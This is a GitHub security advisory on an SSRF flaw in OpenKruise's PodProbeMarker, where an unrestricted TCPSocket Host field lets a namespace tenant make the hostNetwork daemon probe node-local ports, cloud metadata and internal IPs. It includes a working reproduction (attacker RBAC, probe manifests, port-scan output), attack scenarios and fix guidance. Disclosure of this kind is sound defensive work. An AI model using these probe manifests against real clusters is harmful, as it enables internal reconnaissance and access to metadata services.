GHSA-9FJ4-3849-RV9G

Vulnerability from github – Published: 2026-02-25 18:30 – Updated: 2026-02-27 21:48
Summary
OpenKruise PodProbeMarker is Vulnerable to SSRF via Unrestricted Host Field
Details

Summary

PodProbeMarker allows defining custom probes with TCPSocket or HTTPGet handlers. The webhook validation does not restrict the Host field in these probe configurations. Because kruise-daemon runs with hostNetwork=true, it executes probes from the node's network namespace. An attacker with permission to create PodProbeMarker resources can therefore specify arbitrary Host values (e.g., 127.0.0.1, 169.254.169.254, or internal IPs) to trigger SSRF from the node, perform port scanning, and read the results back through NodePodProbe status messages.

Kubernetes Version

  • Kubernetes: v1.30.0 (kind cluster)
  • Distribution: kind

Component Version

  • OpenKruise: v1.8.0
  • kruise-daemon: DaemonSet with hostNetwork=true
  • Affected CRDs: PodProbeMarker, NodePodProbe

Steps To Reproduce

Environment Setup

  1. Install OpenKruise v1.8.0 in kind cluster:
helm repo add openkruise https://openkruise.github.io/charts/
helm install kruise openkruise/kruise --version 1.8.0 \
  --namespace kruise-system --create-namespace
  2. Verify kruise-daemon runs with hostNetwork:
kubectl -n kruise-system get ds kruise-daemon -o yaml | grep hostNetwork

Output:

hostNetwork: true
  3. Create test namespace and RBAC:
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: tenant-a
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: attacker
  namespace: tenant-a
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ppm-creator
  namespace: tenant-a
rules:
- apiGroups: ["apps.kruise.io"]
  resources: ["podprobemarkers"]
  verbs: ["create","get","list","watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ppm-creator-binding
  namespace: tenant-a
subjects:
- kind: ServiceAccount
  name: attacker
  namespace: tenant-a
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: ppm-creator
EOF
  4. Deploy victim workload:
kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: victim
  namespace: tenant-a
spec:
  replicas: 1
  selector:
    matchLabels:
      app: victim
  template:
    metadata:
      labels:
        app: victim
    spec:
      containers:
      - name: victim
        image: busybox:1.36
        command: ["/bin/sh","-c","sleep 36000"]
EOF

Exploitation Steps

  5. Verify node-local port accessibility (kubelet healthz):
NODE_CONTAINER=$(docker ps --format '{{.Names}}' | grep control-plane)
docker exec $NODE_CONTAINER curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:10248/healthz

Output:

200
  6. Create SSRF PodProbeMarker targeting node-local port (as attacker):
kubectl -n tenant-a apply --as system:serviceaccount:tenant-a:attacker -f - <<EOF
apiVersion: apps.kruise.io/v1alpha1
kind: PodProbeMarker
metadata:
  name: ppm-tcp-ssrf
  namespace: tenant-a
spec:
  selector:
    matchLabels:
      app: victim
  probes:
  - name: tcp-ssrf
    containerName: victim
    podConditionType: ssrf.kruise.io/tcp
    probe:
      tcpSocket:
        host: 127.0.0.1
        port: 10248
      timeoutSeconds: 2
      periodSeconds: 5
EOF

Output:

podprobemarker.apps.kruise.io/ppm-tcp-ssrf created
  7. Wait for probe execution and observe SSRF result:
sleep 10
NODE_NAME=$(kubectl get nodes -o jsonpath='{.items[0].metadata.name}')
kubectl get nodepodprobe $NODE_NAME -o yaml | grep -A 20 "ppm-tcp-ssrf"

Output:

      name: ppm-tcp-ssrf#tcp-ssrf
      probe:
        tcpSocket:
          host: 127.0.0.1
          port: 10248
status:
  podProbeStatuses:
  - name: victim-8596ff64d6-jklnb
    namespace: tenant-a
    probeStates:
    - lastProbeTime: "2026-01-13T17:48:10Z"
      name: ppm-tcp-ssrf#tcp-ssrf
      state: Succeeded

Evidence: The probe succeeded, confirming that kruise-daemon reached the node-local port 127.0.0.1:10248 from the node's network namespace.

  8. Demonstrate port scanning capability (closed port):
kubectl -n tenant-a apply --as system:serviceaccount:tenant-a:attacker -f - <<EOF
apiVersion: apps.kruise.io/v1alpha1
kind: PodProbeMarker
metadata:
  name: ppm-tcp-closed
  namespace: tenant-a
spec:
  selector:
    matchLabels:
      app: victim
  probes:
  - name: tcp-closed
    containerName: victim
    podConditionType: ssrf.kruise.io/tcp-closed
    probe:
      tcpSocket:
        host: 127.0.0.1
        port: 9999
      timeoutSeconds: 2
      periodSeconds: 5
EOF
  9. Observe port scanning result:
kubectl get nodepodprobe $NODE_NAME -o yaml | grep -A 5 "ppm-tcp-closed"

Output:

    - lastProbeTime: "2026-01-13T17:51:08Z"
      message: 'dial tcp 127.0.0.1:9999: connect: connection refused'
      name: ppm-tcp-closed#tcp-closed
      state: Failed

Evidence: Failed probe with "connection refused" message enables port state differentiation for scanning.

  10. Verify Pod condition and events:
VICTIM_POD=$(kubectl -n tenant-a get pod -l app=victim -o jsonpath='{.items[0].metadata.name}')
kubectl -n tenant-a describe pod $VICTIM_POD | grep -A 10 "Conditions:"

Output:

Conditions:
  Type                        Status
  ssrf.kruise.io/tcp          True
  ssrf.kruise.io/tcp-closed   False

Events:
  Normal  KruiseProbeSucceeded  96s (x24 over 3m26s)  kruise-daemon-podprobe

Source Code Evidence

  11. TCPSocket Host field used without restriction:

File: pkg/daemon/podprobe/prober.go

func (pb *prober) newTCPSocketProber(tcp *v1.TCPSocketAction, podIP string) tcpProber {
    host := tcp.Host
    if host == "" {
        host = podIP
    }
    return tcpProber{
        tcp: tcp,
        host: host,
    }
}
  12. Webhook validation does not check Host field:

File: pkg/webhook/podprobemarker/validating/probe_create_update_handler.go

func validateTCPSocketAction(tcp *corev1.TCPSocketAction, fldPath *field.Path) field.ErrorList {
    return ValidatePortNumOrName(tcp.Port, fldPath.Child("port"))
}

Note: only the port is validated; the Host field is not restricted.
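A stricter check could look like the following stand-alone sketch (function name and shape are assumptions, not the actual kruise webhook API): the Host must be empty (so it defaults to the Pod IP) or match the Pod IP exactly.

```go
package main

import (
	"fmt"
	"net"
)

// validateProbeHost is a hypothetical hardening of the webhook check:
// the Host field must be empty (defaulting to the Pod IP) or equal to
// the Pod IP, so a probe can never be aimed at another host.
func validateProbeHost(host, podIP string) error {
	if host == "" || host == podIP {
		return nil
	}
	if ip := net.ParseIP(host); ip != nil && ip.IsLoopback() {
		return fmt.Errorf("host %q is a loopback address and is forbidden", host)
	}
	return fmt.Errorf("host %q must be empty or equal to the pod IP %q", host, podIP)
}

func main() {
	fmt.Println(validateProbeHost("169.254.169.254", "10.244.0.5"))
}
```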

Attack Scenarios

Scenario 1 - Cloud metadata access:

probe:
  tcpSocket:
    host: 169.254.169.254
    port: 80

Scenario 2 - Internal service discovery:

probe:
  tcpSocket:
    host: 10.0.0.1
    port: 6379

Scenario 3 - Node-local kubelet API:

probe:
  tcpSocket:
    host: 127.0.0.1
    port: 10250

Supporting Material/References

Verification Evidence

  1. kruise-daemon hostNetwork configuration:
$ kubectl -n kruise-system get ds kruise-daemon -o yaml | grep -A 2 "hostNetwork"
      hostNetwork: true
      restartPolicy: Always
  2. Successful SSRF to open port (127.0.0.1:10248):
status:
  podProbeStatuses:
    probeStates:
    - name: ppm-tcp-ssrf#tcp-ssrf
      state: Succeeded
  3. Port scanning result for closed port (127.0.0.1:9999):
status:
  podProbeStatuses:
    probeStates:
    - message: 'dial tcp 127.0.0.1:9999: connect: connection refused'
      name: ppm-tcp-closed#tcp-closed
      state: Failed
  4. Pod condition reflecting probe results:
Conditions:
  Type                        Status
  ssrf.kruise.io/tcp          True
  ssrf.kruise.io/tcp-closed   False

Impact Assessment

  • Confidentiality: Medium-High. Access to node-local services, cloud metadata, internal network resources.
  • Integrity: Low. Primarily information disclosure.
  • Availability: Medium. Resource consumption from probe requests.

Limitations

The HTTPGet probe is rejected by the webhook in OpenKruise v1.8.0:

Error: admission webhook denied the request: spec.probe.probe: Forbidden: current no support http probe

TCPSocket probe remains vulnerable.

Remediation

Temporary mitigation:

  • Restrict PodProbeMarker creation permissions
  • Apply network policies limiting kruise-daemon egress
  • Audit existing PodProbeMarker resources

Permanent fix:

  • Enforce Host field restrictions in webhook validation
  • Deny private IP ranges (127.0.0.0/8, 10.0.0.0/8, 169.254.0.0/16)
  • Require Host to be empty or equal to the Pod IP
  • Sanitize error messages in NodePodProbe status
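The denylist item above can be sketched with the standard library's net.ParseCIDR (illustrative only; the function name and the exact CIDR set are assumptions):

```go
package main

import (
	"fmt"
	"net"
)

// deniedCIDRs mirrors the ranges suggested above; a real deployment
// would likely extend this (e.g. 172.16.0.0/12, 192.168.0.0/16, ::1/128).
var deniedCIDRs = []string{"127.0.0.0/8", "10.0.0.0/8", "169.254.0.0/16"}

// hostDenied reports whether a probe Host falls inside a denied range.
func hostDenied(host string) (bool, error) {
	ip := net.ParseIP(host)
	if ip == nil {
		return false, fmt.Errorf("host %q is not an IP literal", host)
	}
	for _, cidr := range deniedCIDRs {
		_, ipnet, err := net.ParseCIDR(cidr)
		if err != nil {
			return false, err
		}
		if ipnet.Contains(ip) {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	denied, err := hostDenied("169.254.169.254")
	fmt.Println(denied, err)
}
```

Note that hostnames resolving to denied ranges would bypass a purely IP-literal check, which is one reason requiring Host to be empty or equal to the Pod IP is the simpler fix.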


Verification Environment: kind v1.30.0 + OpenKruise v1.8.0


{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openkruise/kruise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.8.0"
            },
            {
              "fixed": "1.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openkruise/kruise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24005"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:30:40Z",
    "nvd_published_at": "2026-02-25T19:43:21Z",
    "severity": "LOW"
  },
  "id": "GHSA-9fj4-3849-rv9g",
  "modified": "2026-02-27T21:48:39Z",
  "published": "2026-02-25T18:30:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openkruise/kruise/security/advisories/GHSA-9fj4-3849-rv9g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24005"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openkruise/kruise/commit/94364b76adf3e8a1749a31afe809a163bed29613"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openkruise/kruise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openkruise/kruise/releases/tag/v1.7.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openkruise/kruise/releases/tag/v1.8.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenKruise PodProbeMarker is Vulnerable to SSRF via Unrestricted Host Field"
}

